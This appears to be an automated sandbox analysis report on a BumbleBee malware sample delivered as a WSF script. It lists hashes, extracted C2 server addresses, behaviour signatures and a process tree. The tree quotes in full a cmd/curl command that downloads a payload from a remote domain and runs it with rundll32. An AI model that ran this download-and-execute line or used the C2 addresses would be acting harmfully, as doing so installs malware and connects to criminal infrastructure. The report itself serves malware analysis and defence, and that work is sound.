Analysis

  • max time kernel
    216s
  • max time network
    236s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-05-2023 07:41

General

  • Target

    doc12QICZ85.wsf

  • Size

    178KB

  • MD5

    518fc2e647ec1a068d96699a7c81f09f

  • SHA1

    2f1852128b1797ecb20557109c503197992d5ff7

  • SHA256

    5b7dfd88fcbbbb7e3d1b4b6606c4fdd10397dd5c00e18cfe83cd9a94ed136246

  • SHA512

    2bf8fe6ac6316b64ba2f57ca9e6bdc922913d07b5a2cd9efeae453feb2ac7bc9e621b706ca245673a9b2d73d437592b9f2cedf78e5370db8f3dc8e6afbf3ee76

  • SSDEEP

    3072:1eULHHO+zbe2qOX/w+A429OutoWjVM8kgCRreRlW+Q5HUJAWo5hiaPJhO5Q51lJO:Y8SOXY7txjVM8kgUeRlW+FAWo5AaPjCb

Score
10/10

Malware Config

Extracted

Family

bumblebee

Botnet

mc1904

C2

146.70.155.82:443

149.3.170.179:443

103.175.16.150:443

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a webshell malware written in C++.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc12QICZ85.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq && if exist cjaelvdb.yaq rundll32 cjaelvdb.yaq,bYXjdERymsFY && del cjaelvdb.yaq
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\system32\curl.exe
        curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq
        3⤵
          PID:3208
        • C:\Windows\system32\rundll32.exe
          rundll32 cjaelvdb.yaq,bYXjdERymsFY
          3⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious use of NtCreateThreadExHideFromDebugger
          PID:4216

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\cjaelvdb.yaq

      Filesize

      1.4MB

      MD5

      2f7cc32eab5132846f2c60cd49b11503

      SHA1

      a3bd016dd1d2f26857594d4d60f36bc73e9ede99

      SHA256

      187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c

      SHA512

      2ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433

    • C:\Users\Admin\AppData\Local\Temp\cjaelvdb.yaq

      Filesize

      1.4MB

      MD5

      2f7cc32eab5132846f2c60cd49b11503

      SHA1

      a3bd016dd1d2f26857594d4d60f36bc73e9ede99

      SHA256

      187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c

      SHA512

      2ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433

    • memory/4216-136-0x00000222388C0000-0x0000022238A21000-memory.dmp

      Filesize

      1.4MB

    • memory/4216-137-0x00000222388C0000-0x0000022238A21000-memory.dmp

      Filesize

      1.4MB

    • memory/4216-138-0x0000022236D10000-0x0000022236D8A000-memory.dmp

      Filesize

      488KB

    • memory/4216-139-0x00000222388C0000-0x0000022238A21000-memory.dmp

      Filesize

      1.4MB